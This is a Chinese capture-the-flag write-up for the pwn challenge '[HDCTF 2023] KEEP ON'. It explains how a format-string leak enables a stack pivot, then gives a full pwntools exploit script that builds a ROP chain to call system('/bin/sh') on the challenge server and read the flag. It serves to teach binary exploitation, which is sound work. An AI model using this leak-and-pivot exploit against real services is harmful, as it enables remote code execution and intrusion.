栈迁移([HDCTF 2023]KEEP ON)

栈迁移

[HDCTF 2023]KEEP ON | NSSCTF

  1. 题目给了一个格式化字符串的漏洞,和一个栈溢出漏洞,但是栈溢出的位置有限,只能溢出到返回值的位置,这样构造的ROP链不能完全写入到栈上,需要进行栈迁移:

  2. 确定栈迁移的目标位置:输入数组s的首地址,首先利用而格式化字符串泄漏bp寄存器指向的栈上的数据(是函数调用者即vuln的栈低指针),根据该值可以确定与s首地址的偏移x,从而用 泄漏的数据-x 来覆盖bp处的值, 泄漏的数据-x 处即为新的栈空间。

    • 调试确定 格式化字符串泄漏数据的位置bp处值与s的偏移量 ,可以看到bp寄存器指向的位置在输出字符串中的 第16个 ,s的首地址(0x7fffffffddb0)与泄漏的值(0x7fffffffde10)之间的距离相差 0x60

  3. EXP,其中 target+40 是我们输入字符串 b'/bin/sh' 的地址,要放在 pop_rdi_ret 传参:

    python 复制代码
    from pwn import *    
    context(os='linux', arch='amd64', log_level='debug')
    p=remote('node4.anna.nssctf.cn',28697)
    
    #ROPgadget获取一些必要指令的地址
    leave_ret = 0x4007f2	#栈迁移使用
    pop_rdi_ret = 0x4008d3	#传参使用
    ret_addr = 0x4005b9		#栈平衡使用
    sys_addr = 0x4005E0		#挟制ip使用
    p.recvuntil(b'please show me your name: \n')
    
    #泄漏地址
    payload = b'%16$p'
    p.sendline(payload)
    p.recvuntil(b'hello,')
    target = eval(p.recv(14).decode())
    print(hex(target))
    p.recvuntil(b'keep on !\n')
    
    #计算栈迁移后的首地址
    target = target - 0x60
    payload = (b'aaaaaaaa'+p64(ret_addr)+p64(pop_rdi_ret)+p64(target+40)+p64(sys_addr)+b'/bin/sh').ljust(0x50,b'\x00')+p64(target)+p64(leave_ret)
    p.sendline(payload)
    p.sendline(b'cat flag.txt')
    p.interactive()
相关推荐
孙严Pay4 小时前
快捷支付:高效安全的在线支付新选择
笔记·科技·计算机网络·其他·微信
じ☆冷颜〃4 小时前
黎曼几何驱动的算法与系统设计:理论、实践与跨领域应用
笔记·python·深度学习·网络协议·算法·机器学习
数据皮皮侠AI6 小时前
上市公司股票名称相似度(1990-2025)
大数据·人工智能·笔记·区块链·能源·1024程序员节
yuhaiqun19896 小时前
学服务器训练AI模型:5步路径助力高效入门
运维·服务器·人工智能·笔记·机器学习·ai
雍凉明月夜7 小时前
深度学习网络笔记Ⅳ(Transformer + VIT)
笔记·深度学习·transformer
做cv的小昊7 小时前
【TJU】信息检索与分析课程笔记和练习(7)数据库检索—Ei
数据库·笔记·学习·全文检索
Chris_12198 小时前
Halcon学习笔记-Day6:工业视觉高级技术应用与实战项目
笔记·学习·halcon
AI视觉网奇9 小时前
audio2face mh_arkit_mapping_pose_A2F 不兼容
笔记·ue5
wdfk_prog10 小时前
[Linux]学习笔记系列 -- [fs]super
linux·笔记·学习
日更嵌入式的打工仔10 小时前
单片机基础知识:内狗外狗/软狗硬狗
笔记·单片机